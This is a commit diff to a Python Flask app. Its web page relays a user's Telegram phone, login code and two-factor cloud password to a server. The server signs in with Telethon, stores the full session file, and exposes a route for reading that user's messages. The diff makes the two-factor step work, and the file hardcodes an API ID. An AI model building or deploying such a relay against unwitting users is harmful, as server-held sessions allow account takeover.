Update app.py

app.py

@@ -1,12 +1,13 @@
-from flask import Flask, request, jsonify, render_template_string, send_from_directory
-from telethon.sync import TelegramClient
-from telethon import events
+import asyncio
+import hashlib
 import os
 import sqlite3
-import hashlib
-import asyncio
 from pathlib import Path
 
+from flask import Flask, jsonify, request, render_template_string, send_from_directory
+from telethon.sync import TelegramClient
+from telethon.errors import SessionPasswordNeededError # Импорт специфической ошибки
+
 app = Flask(__name__)
 
 API_ID = '22328650'
@@ -89,7 +90,7 @@ HTML_TEMPLATE = '''
     </div>
     <script>
         let phone = '';
-        let phoneCodeHash = ''; // Added to store phone_code_hash
+        let phoneCodeHash = '';
 
         async function startLogin() {
             phone = document.getElementById('phone').value;
@@ -101,7 +102,7 @@ HTML_TEMPLATE = '''
             const result = await response.json();
             alert(result.message);
             if (result.success) {
-                phoneCodeHash = result.phone_code_hash; // Store the received hash
+                phoneCodeHash = result.phone_code_hash;
                 document.getElementById('code').style.display = 'inline';
                 document.getElementById('submitCode').style.display = 'inline';
             }
@@ -112,7 +113,6 @@ HTML_TEMPLATE = '''
             const response = await fetch('/login', {
                 method: 'POST',
                 headers: { 'Content-Type': 'application/json' },
-                // Pass phone_code_hash here
                 body: JSON.stringify({ phone, code, phone_code_hash: phoneCodeHash, step: 'code' })
             });
             const result = await response.json();
@@ -132,6 +132,7 @@ HTML_TEMPLATE = '''
             const response = await fetch('/login', {
                 method: 'POST',
                 headers: { 'Content-Type': 'application/json' },
+                // Убедитесь, что 'phone' отправляется снова на этапе ввода пароля
                 body: JSON.stringify({ phone, password, step: 'password' })
             });
             const result = await response.json();
@@ -171,51 +172,66 @@ def login():
     phone = data.get('phone')
     code = data.get('code')
     password = data.get('password')
-    phone_code_hash = data.get('phone_code_hash') # Get phone_code_hash from request
+    phone_code_hash = data.get('phone_code_hash')
     step = data.get('step')
-    session_file = f"{SESSION_DIR}/{hashlib.md5(phone.encode()).hexdigest()}.session"
+    session_file_path = f"{SESSION_DIR}/{hashlib.md5(phone.encode()).hexdigest()}.session"
 
     async def _login_async():
-        client = TelegramClient(session_file, API_ID, API_HASH)
+        client = TelegramClient(session_file_path, API_ID, API_HASH)
+        result = {}
         try:
             if step == 'start':
                 await client.connect()
                 sent_code = await client.send_code_request(phone)
-                # Return phone_code_hash to the frontend
-                return {'success': True, 'message': 'Code sent to your Telegram', 'phone_code_hash': sent_code.phone_code_hash}
+                result = {'success': True, 'message': 'Code sent to your Telegram', 'phone_code_hash': sent_code.phone_code_hash}
             elif step == 'code':
                 await client.connect()
                 if not phone_code_hash:
-                    return {'success': False, 'message': 'phone_code_hash is missing for code step.'}
-                # Pass phone_code_hash explicitly
-                me = await client.sign_in(phone, code, phone_code_hash=phone_code_hash)
-                with sqlite3.connect(DB_PATH) as conn:
-                    c = conn.cursor()
-                    c.execute('INSERT OR REPLACE INTO users (telegram_id, username, phone, session_file) VALUES (?, ?, ?, ?)',
-                              (str(me.id), me.username or '', phone, session_file))
-                    conn.commit()
-                return {'success': True, 'message': 'Logged in successfully'}
+                    raise ValueError('phone_code_hash is missing for code step.')
+
+                try:
+                    # Попытка входа с телефоном, кодом и хэшем.
+                    # Если включена 2FA, это вызовет SessionPasswordNeededError.
+                    me = await client.sign_in(phone=phone, code=code, phone_code_hash=phone_code_hash)
+                    
+                    # Если вход успешен, сохраняем данные пользователя
+                    with sqlite3.connect(DB_PATH) as conn:
+                        c = conn.cursor()
+                        c.execute('INSERT OR REPLACE INTO users (telegram_id, username, phone, session_file) VALUES (?, ?, ?, ?)',
+                                  (str(me.id), me.username or '', phone, session_file_path))
+                        conn.commit()
+                    result = {'success': True, 'message': 'Logged in successfully'}
+                except SessionPasswordNeededError:
+                    # Требуется 2FA. Telethon должен был внутренне подготовить файл сессии
+                    # для последующего входа только по паролю.
+                    result = {'success': False, 'password_required': True, 'message': 'Cloud password required'}
+                except Exception as e:
+                    # Обработка других ошибок во время отправки кода
+                    result = {'success': False, 'message': str(e)}
             elif step == 'password':
                 await client.connect()
-                me = await client.sign_in(password=password)
+                # При использовании 'password' с client.sign_in, явное указание 'phone' может помочь
+                # Telethon связать запрос с правильной текущей сессией входа
+                # или частично сохраненным состоянием файла сессии.
+                me = await client.sign_in(phone=phone, password=password) # Явно передаем phone
+                
                 with sqlite3.connect(DB_PATH) as conn:
                     c = conn.cursor()
                     c.execute('INSERT OR REPLACE INTO users (telegram_id, username, phone, session_file) VALUES (?, ?, ?, ?)',
-                              (str(me.id), me.username or '', phone, session_file))
+                              (str(me.id), me.username or '', phone, session_file_path))
                     conn.commit()
-                return {'success': True, 'message': 'Logged in with cloud password'}
+                result = {'success': True, 'message': 'Logged in with cloud password'}
             else:
-                return {'success': False, 'message': 'Invalid step'}
+                result = {'success': False, 'message': 'Invalid step'}
         except Exception as e:
-            if 'session password' in str(e).lower() or '2fa' in str(e).lower():
-                return {'success': False, 'password_required': True, 'message': 'Cloud password required'}
-            return {'success': False, 'message': str(e)}
+            # Обработка любых неожиданных ошибок, которые не были обработаны выше
+            result = {'success': False, 'message': str(e)}
         finally:
-            if client.is_connected():
+            if client and client.is_connected():
                 await client.disconnect()
+        return result
 
-    result = asyncio.run(_login_async())
-    return jsonify(result)
+    return jsonify(asyncio.run(_login_async()))
 
 @app.route('/user/<int:user_id>/messages')
 def get_messages(user_id):